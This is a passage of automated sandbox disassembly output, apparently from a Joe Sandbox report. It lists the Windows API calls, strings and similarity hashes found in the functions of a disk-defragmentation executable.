                                                                                                                                                                                                                                                                                    • API String ID: 730354411-73662114
                                                                                                                                                                                                                                                                                    • Opcode ID: 34c2affe364ff515f50bf47c1b61d1c427e18055d02fed05966bd6094f2674e3
                                                                                                                                                                                                                                                                                    • Instruction ID: 8816fc286b8afc534f6afc75fd391673b4d725b22e86aab22ab11b698ddc2395
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34c2affe364ff515f50bf47c1b61d1c427e18055d02fed05966bd6094f2674e3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE3182B1654700ABC310EF25DC42F9B77E8FF84B15F104A1EF59AA21D0DBB8A544CB99
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 00423369
                                                                                                                                                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001), ref: 00423448
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00423452
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorForegroundIconLastNotifyShell_Window
                                                                                                                                                                                                                                                                                    • String ID: $>$3401082$3401083
                                                                                                                                                                                                                                                                                    • API String ID: 4150770455-2005305407
                                                                                                                                                                                                                                                                                    • Opcode ID: 7028775615fcb4f910a592c69760713685972df336b13bea8f76cfa9de920131
                                                                                                                                                                                                                                                                                    • Instruction ID: 90de86b5fd52155df775e515d11431d32a4523fc17091ff82a2e95fa86d8e88e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7028775615fcb4f910a592c69760713685972df336b13bea8f76cfa9de920131
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2317EB1644301ABD310DF64DC4AFABB7E4FF44710F10892EF65EA2290DBB9A544CB99
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00431D46
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 00431D78
                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00431D9E
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00431DBC
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00431DCA
                                                                                                                                                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00431E69
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CompatibleCreate$BitmapClientMessageObjectRectSelectSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2414545248-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 8c412c0476ba2fc4ae0c4b603c0ca6f6675f8a42d5d8e24ea628546f2118f678
                                                                                                                                                                                                                                                                                    • Instruction ID: 8bb2e0385ae3c531c2e170360c03eff7dceb5b5f9b27b4236f5b68df8b256744
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c412c0476ba2fc4ae0c4b603c0ca6f6675f8a42d5d8e24ea628546f2118f678
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22412AB1508340AFC314DF68C985E5BBBE8FBC8714F048A1EF59993291DBB4E904CB66
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,113262B6), ref: 0045FBFD
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045FD6C
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00460023
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00460032
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseCreateErrorFileHandleLastUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                    • String ID: \\.\C:
                                                                                                                                                                                                                                                                                    • API String ID: 2002255750-259948872
                                                                                                                                                                                                                                                                                    • Opcode ID: c925c25cf8bd047c9e5a3396a1d52339d9f8b9f25dbfcc1fd449f57c1f375c63
                                                                                                                                                                                                                                                                                    • Instruction ID: f68b579a164141f6a35d8a11ab023a6fd55b536e149a63f8f0d67cb16e8cd9f8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c925c25cf8bd047c9e5a3396a1d52339d9f8b9f25dbfcc1fd449f57c1f375c63
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53F139B15183419FC324DF25C881AAFB7E4BF89714F104A2EF99983351E778A948CB97
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,?,?), ref: 004055AD
                                                                                                                                                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,...,00000003,?), ref: 0040561D
                                                                                                                                                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,?,?), ref: 00405675
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ExtentPoint32Text
                                                                                                                                                                                                                                                                                    • String ID: ...$`=
                                                                                                                                                                                                                                                                                    • API String ID: 223599850-889875407
                                                                                                                                                                                                                                                                                    • Opcode ID: cfd37b444cbe07eee17d323b4eeec1b5ef4d4266a78bd93aad60d0bf55c5740e
                                                                                                                                                                                                                                                                                    • Instruction ID: 472bae36e9bbe25dca023677f1d007ac7a5f0ef4219e7f68ecfc9801725c9705
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cfd37b444cbe07eee17d323b4eeec1b5ef4d4266a78bd93aad60d0bf55c5740e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31E131755087059FC310DF68C884A5BBBE5FB88304F548A2EF896A33A1D774E885CF96
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004042FE
                                                                                                                                                                                                                                                                                    • GetDIBColorTable.GDI32(00000000,?,00000001,?,?,?,004042D6,?,?,?,?,?,?,?,00000000), ref: 0040431B
                                                                                                                                                                                                                                                                                    • TransparentBlt.MSIMG32(?,?,?,?,?,00000000,?,?,?,00000000,00000000,?,004042D6,?,?,?), ref: 00404360
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 004043F4
                                                                                                                                                                                                                                                                                      • Part of subcall function 00401270: InterlockedExchange.KERNEL32(00497DDC,00000000), ref: 00401283
                                                                                                                                                                                                                                                                                      • Part of subcall function 00401270: CreateCompatibleDC.GDI32(00000000), ref: 00401295
                                                                                                                                                                                                                                                                                    • AlphaBlend.MSIMG32(?,?,?,?,?,00000000,?,?,?,00000000,00000000,?,?,004042D6,?), ref: 004043AC
                                                                                                                                                                                                                                                                                    • StretchBlt.GDI32(?,?,?,?,?,00000000,?,?,?,00000000,00CC0020), ref: 004043DE
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ObjectSelect$AlphaBlendColorCompatibleCreateExchangeInterlockedStretchTableTransparent
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1847558199-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 2ccb637a71d9e589383f213da76c4c0399f3231d086deb3d0b5e9ca5541171ac
                                                                                                                                                                                                                                                                                    • Instruction ID: 431ece418818d9ed3e284c2d9fdf2eea9b1bc5e51d71579e1970bbd9de33fc15
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ccb637a71d9e589383f213da76c4c0399f3231d086deb3d0b5e9ca5541171ac
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6641C9B1208740AFD214CB6AC884E2BB7E9EBCD718F108B1DF59DA3691D674ED01CB65
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00008004,00000000), ref: 00424B28
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 0e9a12f4cd1428a8c886e080b16f46ae2ab08dd8028c450c4ed05d7ef20e7a6a
                                                                                                                                                                                                                                                                                    • Instruction ID: 473d6bda932dfe5e5726b0cd1595cc7b0c8836d5ab7cb817983b5e362455a3d3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e9a12f4cd1428a8c886e080b16f46ae2ab08dd8028c450c4ed05d7ef20e7a6a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A21D87176021077EB60AA94DCC6FD12354AB54B05F44407ABB04BE1C6CFEA6440CB69
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0041109B
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 004110AE
                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 004110CF
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 004110E2
                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0041110B
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0041111E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSendVisibleWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3984873885-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 39c62f6c9bf8f9dbe62311a360a421a223595c9398a47a098b9634c644438ce1
                                                                                                                                                                                                                                                                                    • Instruction ID: f50cee19580f5a7b4a735ae81b0960ad1265907f2bd47cc1e7f642e33356c098
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39c62f6c9bf8f9dbe62311a360a421a223595c9398a47a098b9634c644438ce1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC21A070A40316ABD730DF759C41BAB7698BB88740F050A3EB649DB391EA75EC80879D
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 0040E9D6
                                                                                                                                                                                                                                                                                    • LPtoDP.GDI32(?,?,00000002), ref: 0040E9EE
                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040EA08
                                                                                                                                                                                                                                                                                    • GetMapMode.GDI32(?,?,0047D9F0,00000000), ref: 0040EA2E
                                                                                                                                                                                                                                                                                    • DPtoLP.GDI32(?,?,00000002), ref: 0040EA45
                                                                                                                                                                                                                                                                                    • GetBkColor.GDI32(?), ref: 0040EA78
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CompatibleCreate$BitmapColorMode
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 451781270-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 823297d3b1078f9247b71e0cb78166e85bcb58cd2136858b8ed66297f6f43318
                                                                                                                                                                                                                                                                                    • Instruction ID: 3bfa88b0da709e4d3224c5894ad5c167e82e64c80dae2195e34fb9d2b55d46f1
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 823297d3b1078f9247b71e0cb78166e85bcb58cd2136858b8ed66297f6f43318
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3931E975200600AFC724DF65D984D5BB7E9FF88700B448A2DA94A8B646DB34E944CFA5
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 004650D8
                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 004650E9
                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004650F0
                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 004650F9
                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00465108
                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0046512C
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 1baab8f901f74b7d771640b7584b37378778b1bccb696bde4da89b114f453174
                                                                                                                                                                                                                                                                                    • Instruction ID: c3f58fe0059228c05da5b00147ff564d140f859395390daa2f6f08e4d30ee4c4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1baab8f901f74b7d771640b7584b37378778b1bccb696bde4da89b114f453174
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E21FF74900F00AAE3302F21EC89717BBF4FB85741F918D2EE5C5406A0EB3594688B4A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0042571B
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,-00000002,00000002), ref: 00425737
                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?,?,?,?,?,?,?), ref: 00425888
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$InvalidateRect
                                                                                                                                                                                                                                                                                    • String ID: Button_Check$`=
                                                                                                                                                                                                                                                                                    • API String ID: 2778011698-3236272720
                                                                                                                                                                                                                                                                                    • Opcode ID: 45b91e48737b704d3f690cfb1dc7e8588fa66482c43df7c3c5e128cf77c7356e
                                                                                                                                                                                                                                                                                    • Instruction ID: 0eaeb928ae6b5a569979d6d52056a3389dc0ef6ae13505e9256ef6b005c906b2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45b91e48737b704d3f690cfb1dc7e8588fa66482c43df7c3c5e128cf77c7356e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 55510432304611DFC724EF68D8C4E9BB7A4EF88320F514A2AE95597391D774FC418BAA
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • OpenThemeData.UXTHEME(?,LISTVIEW,00000001), ref: 00416A0B
                                                                                                                                                                                                                                                                                    • DrawThemeBackground.UXTHEME(?,?,00000006,00000002,?,00000000,?,00FFFFFF), ref: 00416A5D
                                                                                                                                                                                                                                                                                    • CloseThemeData.UXTHEME(?), ref: 00416A68
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00416A89
                                                                                                                                                                                                                                                                                      • Part of subcall function 00416430: GetWindowRect.USER32(?,?), ref: 00416443
                                                                                                                                                                                                                                                                                      • Part of subcall function 00416430: InflateRect.USER32(?,00000002,00000002), ref: 00416452
                                                                                                                                                                                                                                                                                      • Part of subcall function 00416430: GetParent.USER32(?), ref: 00416467
                                                                                                                                                                                                                                                                                      • Part of subcall function 00416430: GetParent.USER32(?), ref: 0041647A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00416430: InvalidateRect.USER32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00478B80,000000FF,00416365), ref: 0041648D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: RectTheme$DataParent$BackgroundCloseDrawInflateInvalidateMessageOpenSendWindow
                                                                                                                                                                                                                                                                                    • String ID: LISTVIEW
                                                                                                                                                                                                                                                                                    • API String ID: 2600991427-1680257557
                                                                                                                                                                                                                                                                                    • Opcode ID: 0229e11747b3cd2e378b549adb87a154061692a6bd490272b80820133ddceee6
                                                                                                                                                                                                                                                                                    • Instruction ID: fa80797a93d1b306fb8333d11dc9e085901b6c38828278b42b81b7196f356a38
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0229e11747b3cd2e378b549adb87a154061692a6bd490272b80820133ddceee6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 415106B56083009FC314DF68C981A6BB7E9FF88744F108A2EF59987390D778E945CB96
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00424680
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0042471F
                                                                                                                                                                                                                                                                                    • SetTimer.USER32(?,00000002,000003E8,00000000), ref: 0042474F
                                                                                                                                                                                                                                                                                    • KillTimer.USER32(?,00000002), ref: 00424770
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Timer$InvalidateKillRectRedrawWindow
                                                                                                                                                                                                                                                                                    • String ID: `=
                                                                                                                                                                                                                                                                                    • API String ID: 4168450595-2762138152
                                                                                                                                                                                                                                                                                    • Opcode ID: 8d72688a5271403dce2d565fb5cb8f01ebbe79f233b85fa5517f2f7365920491
                                                                                                                                                                                                                                                                                    • Instruction ID: 7d708aa27c06dc00fcb9f864fdcaa6ded2618e4328842cf70fbd9c9851442ce7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d72688a5271403dce2d565fb5cb8f01ebbe79f233b85fa5517f2f7365920491
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3941A23170021ADFC730EF65EC88B9AB3A5FF85315F50452EE85997290CB78A984CF69
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,?,?,?,00000000,00476569,000000FF,0041A806), ref: 0041A883
                                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000,00476569,000000FF,0041A806), ref: 0041A8F4
                                                                                                                                                                                                                                                                                    • SHCreateDirectory.SHELL32(00000000,?,?,?,?,?,00000000,00476569,000000FF,0041A806), ref: 0041A904
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Path$CreateDirectoryExistsFileFolderSpecial
                                                                                                                                                                                                                                                                                    • String ID: DiskDefrag$\DiskDefrag
                                                                                                                                                                                                                                                                                    • API String ID: 106629909-1352560241
                                                                                                                                                                                                                                                                                    • Opcode ID: f1b0aa55b9a1a9fc4a94be1b2fda63a650aa8c59690cdb364ca348087f413052
                                                                                                                                                                                                                                                                                    • Instruction ID: 938fb3785b8e758ab9aa55aacaf13088161b2d62692eeac53cc892e3a5652775
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f1b0aa55b9a1a9fc4a94be1b2fda63a650aa8c59690cdb364ca348087f413052
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE4195B16083019BD300EF65DD85AABB7E4FF98714F00453EF54AD2290EB349949CBAB
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ObjectSelect
                                                                                                                                                                                                                                                                                    • String ID: `=
                                                                                                                                                                                                                                                                                    • API String ID: 1517587568-2762138152
                                                                                                                                                                                                                                                                                    • Opcode ID: 116e8130f725741a0df8cffd76ef37318a9139d2394634156b2cf1340f76da15
                                                                                                                                                                                                                                                                                    • Instruction ID: 398bc34aaeb48a28786a3eeef8d096b9ba9882d646282afc346b5bddce66a1f9
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 116e8130f725741a0df8cffd76ef37318a9139d2394634156b2cf1340f76da15
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36417E32200A048FD724EFA9E884E6BF3A5EF94321B05852FE84A97611DB35F840CB55
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(PowrProf.dll,00000001,?,0042198D,00000002), ref: 0041E189
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetSuspendState), ref: 0041E19B
                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0041E1B7
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                    • String ID: PowrProf.dll$SetSuspendState
                                                                                                                                                                                                                                                                                    • API String ID: 145871493-1420736420
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00467820: DeleteObject.GDI32(00000000), ref: 00467935
                                                                                                                                                                                                                                                                                    • GdiplusShutdown.GDIPLUS(?,?,113262B6,00093C38,?,?,?,?,00000000,0047812F,000000FF,0041A4F1,113262B6,00093C38), ref: 00465814
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004658CF
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00465921
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00465973
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004659C5
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: DeleteObject$GdiplusShutdown
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1337965791-0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: __aullrem$__aulldiv
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3670715282-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 9c34d576a32de794e1e0b0d0fca0d0e7c205ee0b047ab4e09ce85ba4a67a3df8
                                                                                                                                                                                                                                                                                    • Instruction ID: fa94849079e70c1b34915df37323d6afc94868806176a113829b563514bd0fbf
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c34d576a32de794e1e0b0d0fca0d0e7c205ee0b047ab4e09ce85ba4a67a3df8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43311775208305AFD200EA65E881D2FB3E9EBC8749F50491EF98497302D738FD498AB6
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Rect$Client$EventMouseTrack
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1879027383-0
                                                                                                                                                                                                                                                                                    • Opcode ID: f4e17d1d92922ba5e38ce16bca10ed58a203127cbb1472af428a1092aff2016b
